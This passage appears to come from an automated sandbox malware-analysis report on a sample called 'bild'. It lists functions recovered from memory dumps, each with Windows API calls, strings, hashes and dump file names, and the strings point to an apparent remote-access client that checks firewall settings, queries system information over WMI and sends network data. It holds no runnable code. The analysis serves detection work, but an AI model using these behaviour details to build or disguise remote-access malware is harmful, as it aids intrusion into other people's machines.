                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: QueryValue_memsetwsprintf
                                                                                                              • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                                              • API String ID: 1333399081-1346142259
                                                                                                              • Opcode ID: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
                                                                                                              • Instruction ID: d38f3a4d66d5a90606c53f5b1b84405609ec5bb3b13ff7cea0d7775b25b40b12
                                                                                                              • Opcode Fuzzy Hash: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
                                                                                                              • Instruction Fuzzy Hash: C6419D71D02269AFEB11DB64CC90BDEF7B8EB44314F0445E9E819A7281EB35AB48CF50
                                                                                                              APIs
                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 1100FDED
                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 1100FE10
                                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 1100FE94
                                                                                                              • __CxxThrowException@8.LIBCMT ref: 1100FEA2
                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 1100FEB5
                                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100FECF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                              • String ID: bad cast
                                                                                                              • API String ID: 2427920155-3145022300
                                                                                                              • Opcode ID: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
                                                                                                              • Instruction ID: 563b417412927bd42dfe2d2268ce551a617b01fe8fe711e168dc892134580a96
                                                                                                              • Opcode Fuzzy Hash: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
                                                                                                              • Instruction Fuzzy Hash: 5731E975D002669FD711DF94C890BAEF7B8EB04B68F10426DD921A7291DB717D40CB92
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CountTick
                                                                                                              • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK$}?X
                                                                                                              • API String ID: 536389180-246479653
                                                                                                              • Opcode ID: a952649d10152439879ed58b5e1132f0d59133535c4a4a3642475d19345c2f1e
                                                                                                              • Instruction ID: a0019f70d98f4d819e239f855ef0bc8db2e19db1671bc02c3e0d3b7677daedde
                                                                                                              • Opcode Fuzzy Hash: a952649d10152439879ed58b5e1132f0d59133535c4a4a3642475d19345c2f1e
                                                                                                              • Instruction Fuzzy Hash: E4210578A247AB4AFB039B759ED4755FB83578073EF450278DE10862CCDB74A458CB42
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 6C7A6950
                                                                                                                • Part of subcall function 6C7A7BE0: _memset.LIBCMT ref: 6C7A7BFF
                                                                                                                • Part of subcall function 6C7A7BE0: _strncpy.LIBCMT ref: 6C7A7C0B
                                                                                                                • Part of subcall function 6C79A4E0: EnterCriticalSection.KERNEL32(6C7DB898,00000000,?,?,?,6C79DA7F,?,00000000), ref: 6C79A503
                                                                                                                • Part of subcall function 6C79A4E0: InterlockedExchange.KERNEL32(?,00000000), ref: 6C79A568
                                                                                                                • Part of subcall function 6C79A4E0: Sleep.KERNEL32(00000000,?,6C79DA7F,?,00000000), ref: 6C79A581
                                                                                                                • Part of subcall function 6C79A4E0: LeaveCriticalSection.KERNEL32(6C7DB898,00000000), ref: 6C79A5B3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180719718.000000006C791000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C790000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180699601.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180775211.000000006C7D9000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180831579.000000006C7E0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_6c790000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
                                                                                                              • String ID: 1.2$Blzl$Channel$Client$Publish %d pending services
                                                                                                              • API String ID: 1112461860-60556047
                                                                                                              • Opcode ID: 9fd7bc3cd92b9695237770aacb56da975953b531a01d4f3d2143540d0d08a708
                                                                                                              • Instruction ID: f84897f582caf245610d5b7774b81becf7d56e63b761191ec86d037056b64cbc
                                                                                                              • Opcode Fuzzy Hash: 9fd7bc3cd92b9695237770aacb56da975953b531a01d4f3d2143540d0d08a708
                                                                                                              • Instruction Fuzzy Hash: 2B51B131B052058BEB10EBBCEA48B9A77B4BB0230EF240339D955D7A81DB31F646C791
                                                                                                              APIs
                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                                              • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                                              • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                                                • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                                              • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                                              • API String ID: 3494822531-1878648853
                                                                                                              • Opcode ID: 942c5252def4268129969c39a1215845e921a51e2954e507dd92eff7077da9be
                                                                                                              • Instruction ID: dd955378f98185685044f21f066d1e50e049b7277ab8e5714ac6db0ba135c9a8
                                                                                                              • Opcode Fuzzy Hash: 942c5252def4268129969c39a1215845e921a51e2954e507dd92eff7077da9be
                                                                                                              • Instruction Fuzzy Hash: AB518835D4022E5BD711CF24DC50BDEF7A4AF15B08F2401A4D8997BA80EBB27B84CBA5
                                                                                                              APIs
                                                                                                                • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                                                • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                              • LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
                                                                                                              • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
                                                                                                              • std::exception::exception.LIBCMT ref: 11107414
                                                                                                              • __CxxThrowException@8.LIBCMT ref: 11107429
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad$CreateEventException@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                              • String ID: Advapi32.dll$Wtsapi32.dll
                                                                                                              • API String ID: 2851125068-2390547818
                                                                                                              • Opcode ID: aaba10e307cec69a1f7ff7a57bac704082b679f648b946fc7c8140d35e3eefa9
                                                                                                              • Instruction ID: 20da51148d2406ef940ba90f631bbe284ff6dbb95dc7cb8c25b5cdc78ae8e1aa
                                                                                                              • Opcode Fuzzy Hash: aaba10e307cec69a1f7ff7a57bac704082b679f648b946fc7c8140d35e3eefa9
                                                                                                              • Instruction Fuzzy Hash: 2A4115B4D09B449FC761CF6A8940BDAFBE8EFA9604F00490EE5AE93210D7797500CF56
                                                                                                              APIs
                                                                                                              • WaitForSingleObject.KERNEL32(000002E8,000000FF), ref: 1101733C
                                                                                                              • CoInitialize.OLE32(00000000), ref: 11017345
                                                                                                              • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
                                                                                                              • CoUninitialize.COMBASE ref: 110173D0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                                              • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                                              • API String ID: 2407233060-578995875
                                                                                                              • Opcode ID: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
                                                                                                              • Instruction ID: df925c951649f52390f194a40c23bf9fa59b5f59fb7a44760539d7ccd5920114
                                                                                                              • Opcode Fuzzy Hash: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
                                                                                                              • Instruction Fuzzy Hash: 7F2137B5E041259BDB11DFA0CC46BBAB6E8AF40308F0040B9EC69DB184FA79E940D7A1
                                                                                                              APIs
                                                                                                              • WaitForSingleObject.KERNEL32(000002E8,000000FF), ref: 11017252
                                                                                                              • CoInitialize.OLE32(00000000), ref: 1101725B
                                                                                                              • _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
                                                                                                              • CoUninitialize.COMBASE ref: 110172E0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                                              • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                                              • API String ID: 2407233060-2037925671
                                                                                                              • Opcode ID: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
                                                                                                              • Instruction ID: c2f3c346b695d23426c96ecc328f7bdb1aeadc280033f44fb53199f8ba8604cb
                                                                                                              • Opcode Fuzzy Hash: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
                                                                                                              • Instruction Fuzzy Hash: 19210575E016299BD712DFE0CC45BEEB7E89F80718F0001A8FC29DB184EA7AE945C761
                                                                                                              APIs
                                                                                                              • send.WSOCK32(?,?,?,00000000), ref: 6C799C93
                                                                                                              • timeGetTime.WINMM(?,?,?,00000000), ref: 6C799CD0
                                                                                                              • Sleep.KERNEL32(00000000), ref: 6C799CDE
                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C799D4F
                                                                                                              • InterlockedIncrement.KERNEL32(?), ref: 6C799D72
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180719718.000000006C791000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C790000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180699601.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180775211.000000006C7D9000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180831579.000000006C7E0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_6c790000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalIncrementInterlockedLeaveSectionSleepTimesendtime
                                                                                                              • String ID: 3'
                                                                                                              • API String ID: 77915721-280543908
                                                                                                              • Opcode ID: 57cab1362d903542826a4d45b4a02b70ce755dc7984e1f48549f251f6f2604d6
                                                                                                              • Instruction ID: f54bac6aae0f0a042d20eae45e4b1827ba4010a57aea89bbd8b0f581cdcc0a82
                                                                                                              • Opcode Fuzzy Hash: 57cab1362d903542826a4d45b4a02b70ce755dc7984e1f48549f251f6f2604d6
                                                                                                              • Instruction Fuzzy Hash: 4321AE71A051189FEB20CF64DE89B9AB3B4EF16314F1582E5D90DA7681CB30ED84CF91
                                                                                                              APIs
                                                                                                              • CoInitialize.OLE32(00000000), ref: 11096984
                                                                                                              • CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
                                                                                                              • CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
                                                                                                              • CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                                              • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                                              • API String ID: 3222248624-258972079
                                                                                                              • Opcode ID: f34227f50c1ea86a65abb9f5b461b7bcbc9d9ad9ed009c44ac4fae2586091261
                                                                                                              • Instruction ID: ffe5b7852bae71a5603cb4f529131e3535c43cf5cc9a129c5e7f13935f1cb029
                                                                                                              • Opcode Fuzzy Hash: f34227f50c1ea86a65abb9f5b461b7bcbc9d9ad9ed009c44ac4fae2586091261
                                                                                                              • Instruction Fuzzy Hash: 9C11AC74E0012DABC700EAE5DC95AEFBB68AF45709F100029F50AEB144EA21EA40C7E2
                                                                                                              APIs
                                                                                                              • GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11025D16
                                                                                                              • K32GetProcessImageFileNameA.KERNEL32(?,?,?,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D32
                                                                                                              • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11025D46
                                                                                                              • SetLastError.KERNEL32(00000078,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D69
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                                                              • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                                                              • API String ID: 4186647306-532032230
                                                                                                              • Opcode ID: fbb342385a7ca70d12a15f9985bda82124cf97ba9cccb812bf362dda13377f65
                                                                                                              • Instruction ID: 74662284ed99b9a54ad109221a671fe8fcdc3fa540ca7c31caa090441a4958f5
                                                                                                              • Opcode Fuzzy Hash: fbb342385a7ca70d12a15f9985bda82124cf97ba9cccb812bf362dda13377f65
                                                                                                              • Instruction Fuzzy Hash: 98016D72601718ABE330DEA5EC48F87B7E8EB88765F10052AF95697200D631E8018BA4
